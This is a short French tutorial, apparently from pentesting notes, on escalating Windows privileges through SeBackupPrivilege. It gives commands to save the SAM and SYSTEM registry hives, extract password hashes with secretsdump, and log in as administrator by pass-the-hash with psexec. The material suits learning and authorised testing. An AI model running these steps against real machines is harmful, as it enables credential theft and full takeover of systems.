Cette élévation de privilèges spécifique est basée sur le fait d'attribuer un SeBackupPrivilege à un utilisateur. Il a été conçu pour permettre aux utilisateurs de créer des copies de sauvegarde du système. Puisqu'il n'est pas possible de faire une sauvegarde de quelque chose que vous ne pouvez pas lire. Ce privilège se fait au prix de fournir à l'utilisateur un accès complet en lecture au système de fichiers. Ce privilège doit contourner toute ACL placée par l'administrateur sur le réseau. Donc, en un mot, ce privilège permet à l'utilisateur de lire n'importe quel fichier sur l'intégralité des fichiers qui pourraient également inclure des fichiers sensibles tels que le fichier SAM ou le fichier de registre SYSTEM.

Détection

Une fois connecté sur la machine, il faut vérifier si SeBackupPrivilege est actif dans les résultats de la commande whoami /priv

Exploitation

Comme nous l'avons vu précédemment, ce privilège permet à l'utilisateur de lire tous les fichiers du système, nous l'utiliserons à notre avantage.

On va donc sauvegarder les fichiers SAM et SYSTEM dans un nouveau fichier:

# Création du dossier qui contiendra les fichiers de registre
cd C:\
mkdir Temp
# Sauvegarde des fichiers de registre
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

On va ensuite télécharger les fichiers sur notre machine locale (avec la commande download sur evil-winrm par exemple)

La prochaine étape est d'utiliser secretdump.py pour récolter les hash dont celui qui nous intéresse, celui de l'administrateur.

$ python3 secretdump.py -system <SYSTEM file> -sam <SAM file> local

Il est alors possible d'ouvrir une session administrateur avec le hash de celui-ci:

$ python3 psexec.py -hashes <hash> administrator@<target IP> cmd.exe